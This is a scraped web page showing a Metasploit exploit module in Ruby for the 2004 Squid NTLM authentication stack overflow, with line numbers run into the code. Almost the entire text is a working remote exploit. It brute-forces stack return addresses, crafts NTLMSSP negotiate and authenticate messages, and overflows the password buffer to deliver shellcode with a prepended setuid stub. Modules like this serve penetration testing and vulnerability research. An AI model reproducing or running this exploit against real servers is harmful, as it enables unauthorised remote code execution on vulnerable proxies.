Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/exploits/linux/proxy/squid_ntlm_authenticate.rb
Views: 11784
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = GreatRanking78include Msf::Exploit::Brute9include Msf::Exploit::Remote::Tcp1011def initialize(info = {})12super(update_info(info,13'Name' => 'Squid NTLM Authenticate Overflow',14'Description' => %q{15This is an exploit for Squid\'s NTLM authenticate overflow16(libntlmssp.c). Due to improper bounds checking in17ntlm_check_auth, it is possible to overflow the 'pass'18variable on the stack with user controlled data of a user19defined length. Props to iDEFENSE for the advisory.20},21'Author' => 'skape',22'References' =>23[24[ 'CVE', '2004-0541'],25[ 'OSVDB', '6791'],26[ 'URL', 'http://www.idefense.com/application/poi/display?id=107'],27[ 'BID', '10500'],28],29'Privileged' => false,30'Payload' =>31{32'Space' => 256,33'MinNops' => 16,34'Prepend' => "\x31\xc9\xf7\xe1\x8d\x58\x0e\xb0\x30\x41\xcd\x80",35'PrependEncoder' => "\x83\xec\x7f",3637},38'Platform' => %w{ linux },39'Targets' =>40[41[ 'Linux Bruteforce',42{43'Platform' => 'linux',44'Bruteforce' =>45{46'Start' => { 'Ret' => 0xbfffcfbc, 'Valid' => 0xbfffcf9c },47'Stop' => { 'Ret' => 0xbffffffc, 'Valid' => 0xbffffffc },48'Step' => 049}50},51],52],53'DisclosureDate' => '2004-06-08',54'DefaultTarget' => 0))5556register_advanced_options(57[58# We must wait 15 seconds between each attempt so as to prevent59# squid from exiting completely after 5 crashes.60OptInt.new('BruteWait', [ false, "Delay between brute force attempts", 15 ]),61])62end6364def brute_exploit(addresses)65site = "http://" + rand_text_alpha(rand(128)) + ".com"6667print_status("Trying 0x#{"%.8x" % addresses['Ret']}...")68connect6970trasnmit_negotiate(site)71transmit_authenticate(site, addresses)7273handler74disconnect75end7677def trasnmit_negotiate(site)78negotiate =79"NTLMSSP\x00" + # NTLMSSP identifier80"\x01\x00\x00\x00" + # NTLMSSP_NEGOTIATE81"\x07\x00\xb2\x07" + # flags82"\x01\x00\x09\x00" + # workgroup len/max (1)83"\x01\x00\x00\x00" + # workgroup offset (1)84"\x01\x00\x03\x00" + # workstation len/max (1)85"\x01\x00\x00\x00" # workstation offset (1)8687print_status("Sending NTLMSSP_NEGOTIATE (#{negotiate.length} bytes)")88req =89"GET #{site} HTTP/1.1\r\n" +90"Proxy-Connection: Keep-Alive\r\n" +91"Proxy-Authorization: NTLM #{Rex::Text.encode_base64(negotiate)}\r\n" +92"\r\n"93sock.put(req)9495end9697def transmit_authenticate(site, addresses)98overflow =99rand_text_alphanumeric(0x20) +100[addresses['Ret']].pack('V') +101[addresses['Valid']].pack('V') +102"\xff\x00\x00\x00"103shellcode = payload.encoded104pass_len = [overflow.length + shellcode.length].pack('v')105authenticate =106"NTLMSSP\x00" + # NTLMSSP identifier107"\x03\x00\x00\x00" + # NTLMSSP_AUTHENTICATE108pass_len + pass_len + # lanman response len/max109"\x38\x00\x00\x00" + # lanman response offset (56)110"\x01\x00\x01\x00" + # nt response len/max (1)111"\x01\x00\x00\x00" + # nt response offset (1)112"\x01\x00\x01\x00" + # domain name len/max (1)113"\x01\x00\x00\x00" + # domain name offset (1)114"\x01\x00\x01\x00" + # user name (1)115"\x01\x00\x00\x00" + # user name offset (1)116"\x00\x00\x00\x00" + # session key117"\x8b\x00\x00\x00" + # session key118"\x06\x82\x00\x02" + # flags119overflow + shellcode120121print_status("Sending NTLMSSP_AUTHENTICATE (#{authenticate.length} bytes)")122req =123"GET #{site} HTTP/1.1\r\n" +124"Proxy-Connection: Keep-Alive\r\n" +125"Proxy-Authorization: NTLM #{Rex::Text.encode_base64(authenticate)}\r\n" +126"\r\n"127sock.put(req)128end129end130131132